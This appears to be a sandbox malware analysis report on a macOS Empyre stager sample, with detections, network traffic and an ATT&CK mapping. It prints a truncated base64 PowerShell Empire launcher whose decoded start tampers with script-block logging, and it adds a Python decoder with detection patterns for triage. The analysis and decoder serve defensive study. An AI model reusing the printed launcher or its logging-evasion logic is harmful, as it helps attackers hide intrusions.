Analysis Report SwWPxGBaKt.macho

Overview

General Information

Sample Name: SwWPxGBaKt.macho
Analysis ID: 538
MD5: 480e81fbccf44939cf4ad4d21f9ba230
SHA1: ff68dd82ddd872b04b8605adfc7be8f42bb38b0e
SHA256: c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9

Detection

Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Process executable has a file extension which is uncommon (probably to disguise the executable)
Contains symbols with paths

Startup

  • System is macvm-highsierra
  • SwWPxGBaKt.macho (MD5: 480e81fbccf44939cf4ad4d21f9ba230) Arguments: /Users/berri/Desktop/SwWPxGBaKt.macho
  • cleanup

Yara Overview

No yara matches

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: SwWPxGBaKt.macho | Avira: detected
Multi AV Scanner detection for submitted file
Source: SwWPxGBaKt.macho | Virustotal: Detection: 33%
Source: SwWPxGBaKt.macho | ReversingLabs: Detection: 44%
Source: unknown | TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown | TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown | TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown | TCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknown | TCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknown | TCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknown | TCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp | String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp | String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp | String found in binary or memory: http://www.apple.com/certificateauthority0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp | String found in binary or memory: https://www.apple.com/appleca/0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.0000000103002000.0000000103042000.rw-.sdmp | String found in binary or memory: https://www.python.org/psf/license/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown | Network traffic detected: HTTP traffic on port 49238 -> 443
Source: classification engine | Classification label: mal60.evad.macMACHO@0/0@0/0
Source: submission SwWPxGBaKt.macho | Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o
Source: submission SwWPxGBaKt.macho | Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o
Source: submission SwWPxGBaKt.macho | Mach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
Source: submission SwWPxGBaKt.macho | Mach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
Source: submitted sample | Stderr: File '<string>'; line 1 wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW ^SyntaxError: invalid syntax: exit code = 0
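The Stderr line above is the most informative artefact in this report. The stager (its symbols reference BundledEmpyreLauncher/EmpyreStager) hands an embedded command string to a Python interpreter, but the string is a Windows PowerShell launcher (`... -noP -sta -w 1 -enc <base64>`), so Python raises a SyntaxError at compile time and none of it runs. The `-enc` argument is base64 over UTF-16LE text, and its visible start decodes to the familiar Empire launcher prologue: a PowerShell version gate, reflection into System.Management.Automation.Utils to read cachedGroupPolicySettings, and a lookup of the ScriptBlockLogging policy keys, with strings split as 'ScriptB'+'lockLogging' to dodge naive matching. The decoder below is an added example, not the sandbox vendor's code and not code from the sample; its input is a constructed copy of the beginning of the report's Stderr line, cut short on purpose the way the report's own line is cut, and the `-e`/`-ec`/`-enc` spellings and the indicator labels are my own assumptions.

```python
"""Decode and triage a PowerShell -EncodedCommand blob captured in a log line.

Added example for this report; it is not the sandbox vendor's code and not
code from the sample. It assumes only what the Stderr line above shows: a
launcher of the form '... wershell -noP -sta -w 1 -enc <base64>' in which
<base64> carries UTF-16LE text (the -EncodedCommand convention), and that
the blob may be cut short, as it is in the report.
"""
import base64
import json
import re
from typing import Optional

# Constructed input: the first 640 base64 characters of the report's Stderr
# line (copied verbatim), followed by a deliberately incomplete quantum "JAB"
# to exercise the truncation path, then the trailer the report prints.
REPORT_STDERR_FRAGMENT = (
    "File '<string>'; line 1 wershell -noP -sta -w 1 -enc "
    "SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIA"
    "cwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsA"
    "cgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMA"
    "eQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQA"
    "aQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgA"
    "JwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4A"
    "ZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMA"
    "JwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUA"
    "VABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMA"
    "YwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsA"
    "JAB"
    " ^SyntaxError: invalid syntax: exit code = 0"
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are
# the spellings commonly seen (assumed list). Longest alternative first.
ENC_FLAG_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# 'Script'+'Block' style splits defeat naive substring matching; fold them.
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# Traits of the launcher prologue visible in the decoded text (labels are mine).
INDICATORS = {
    "ps_version_gate": re.compile(r"\$PSVERSIONTABLE\.PSVERSION\.MAJOR", re.I),
    "automation_utils_reflection": re.compile(r"System\.Management\.Automation\.Utils", re.I),
    "cached_group_policy_access": re.compile(r"cachedGroupPolicySettings", re.I),
    "scriptblock_logging_reference": re.compile(r"ScriptBlockLogging", re.I),
}


def extract_encoded_command(line: str) -> Optional[str]:
    """Return the base64 argument of the -EncodedCommand switch, if any."""
    m = ENC_FLAG_RE.search(line)
    return m.group(1) if m else None


def decode_encoded_command(blob: str) -> str:
    """Decode a possibly truncated -EncodedCommand blob to text.

    The blob is base64 over UTF-16LE. Logs often cut it mid-quantum, so:
    drop a lone trailing character (6 bits, nothing recoverable), re-pad the
    last quantum, and drop a dangling odd byte before UTF-16LE decoding.
    """
    blob = re.sub(r"[^A-Za-z0-9+/]", "", blob)  # strip '=' and any noise
    if len(blob) % 4 == 1:
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)
    raw = base64.b64decode(blob)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le")


def fold_string_concats(text: str) -> str:
    """Collapse 'ScriptB'+'lockLogging' into 'ScriptBlockLogging' (repeatedly)."""
    prev = None
    while prev != text:
        prev, text = text, CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


def triage(line: str) -> dict:
    """Decode the -enc argument in a log line and list the launcher traits it shows."""
    blob = extract_encoded_command(line)
    if blob is None:
        return {"encoded": False}
    clean = re.sub(r"[^A-Za-z0-9+/]", "", blob)
    decoded = fold_string_concats(decode_encoded_command(blob))
    return {
        "encoded": True,
        "truncated": len(clean) % 4 != 0,
        "decoded": decoded,
        "indicators": sorted(name for name, rx in INDICATORS.items() if rx.search(decoded)),
    }


if __name__ == "__main__":
    print(json.dumps(triage(REPORT_STDERR_FRAGMENT), indent=2))
```

Run against the fragment, `triage` reports the blob as truncated, returns the decoded prologue (`IF($PSVERSIOnTABlE.PSVErsION.MaJoR -gE 3){$GPF=[rEf].AsSEmbLy.GetTYPE('System.Management.Automation.Utils')...If($GPC['ScriptBlockLogging']){$`, with the split strings already folded) and flags all four traits. The same routine applied to the full line in the report recovers the rest of the launcher up to the point where the sandbox cut it; the truncation handling matters because evidence like this almost never arrives as a complete base64 quantum.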

Hooking and other Techniques for Hiding and Protection:

Process executable has a file extension which is uncommon (probably to disguise the executable)
Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 571) | Process executable with extension: /Users/berri/Desktop/SwWPxGBaKt.macho
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Mitre Att&ck Matrix

Techniques marked (1) have one matching signature in this analysis; the other entries are the matrix template's unmatched techniques for that tactic.

  • Initial Access: Valid Accounts; Default Accounts
  • Execution: Windows Management Instrumentation; Scheduled Task/Job
  • Persistence: Path Interception; Boot or Logon Initialization Scripts
  • Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts
  • Defense Evasion: Masquerading (1); Rootkit
  • Credential Access: OS Credential Dumping; LSASS Memory
  • Discovery: System Information Discovery (1); Application Window Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol
  • Collection: Data from Local System; Data from Removable Media
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
  • Command and Control: Encrypted Channel (1); Application Layer Protocol (1)
  • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS
  • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization
  • Impact: Modify System Partition; Device Lockout
